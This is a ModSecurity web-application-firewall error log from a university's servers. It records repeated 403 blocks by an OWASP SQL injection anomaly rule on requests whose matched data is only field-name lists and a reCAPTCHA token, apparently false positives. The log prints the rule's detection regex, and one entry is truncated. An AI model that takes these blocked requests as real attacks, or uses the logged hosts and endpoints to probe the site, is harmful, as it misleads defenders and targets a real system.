[Tue Aug 29 09:12:31.847747 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UD8Co-f0AAPXlyfUAAAAA"]
[Tue Aug 29 09:12:32.014760 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UEMCo-f0AAPXlyfYAAAAA"]
[Tue Aug 29 09:12:32.183782 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UEMCo-f0AAPXlyfcAAAAA"]
[Tue Aug 29 09:12:32.344725 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UEMCo-f0AAPXlyfgAAAAA"]
[Tue Aug 29 09:12:40.690196 2023] [:error] [pid 62956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UGMCo-f0AAPXsiRsAAAAN"]
[Tue Aug 29 09:12:40.853199 2023] [:error] [pid 62956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UGMCo-f0AAPXsiRwAAAAN"]
[Tue Aug 29 09:12:41.039535 2023] [:error] [pid 62956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UGcCo-f0AAPXsiR0AAAAN"]
[Tue Aug 29 09:16:26.617002 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwD_zWSoW9xqu43YjB0DQ_XYtFQNVT7upkuyBgKsDRfFA48otggO_7Y1zrBKfqqsmDFiYR-EYzQcnqZF4gJg0ktFpi9LCK_SjmOGFZ3asU5jLhJOR8dyGfrwTtVFpnykg4LvxLQMhi6sI68KkBUfet99zZhcG6IqgEv6XsfV5Z-2Puxn-TWc7GB05UFL5khHc7sQGgyGGk1KS4fxHd8VV_i_8kpA2pqc_omzWNtwU7vYVwuQlfZXRm5pl0cdnrWoiSH4xiMB1SavzrPfNBKYZmqYRyw286v9DkJ_5MG59PgWJNxCuQ8sBKdP00IazXfgA4Gf0VvyNHlVtD8VFQLBV91MSIj_ZvmloKccLFkgXRdZQfy2tvSaGYmdlV71kf8zOVR-Gez2jaFsh_frnB9abvoRYzxzTgE5QfTiC3_4jPZ4T5FGNQXm6HhRhKoM7sv..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO1U@sCo-f0AAPa6wdYAAAAM"]
[Tue Aug 29 09:17:14.324126 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VKsCo-f0AAPa6whQAAAAM"]
[Tue Aug 29 09:17:16.087432 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VLMCo-f0AAPa6whUAAAAM"]
[Tue Aug 29 09:17:19.463205 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VL8Co-f0AAPa6whcAAAAM"]
[Tue Aug 29 09:17:19.925883 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VL8Co-f0AAPa6whgAAAAM"]
[Tue Aug 29 09:17:20.093596 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VMMCo-f0AAPa6whkAAAAM"]
[Tue Aug 29 09:17:20.243815 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VMMCo-f0AAPa6whoAAAAM"]
[Tue Aug 29 09:19:25.823173 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VrcCo-f0AAPbOKW0AAAAG"]
[Tue Aug 29 09:19:27.113916 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1Vr8Co-f0AAPbOKW4AAAAG"]
[Tue Aug 29 09:19:27.593569 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1Vr8Co-f0AAPbOKW8AAAAG"]
[Tue Aug 29 09:19:27.752246 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1Vr8Co-f0AAPbOKXAAAAAG"]
[Tue Aug 29 09:19:30.035810 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VssCo-f0AAPbOKXEAAAAG"]
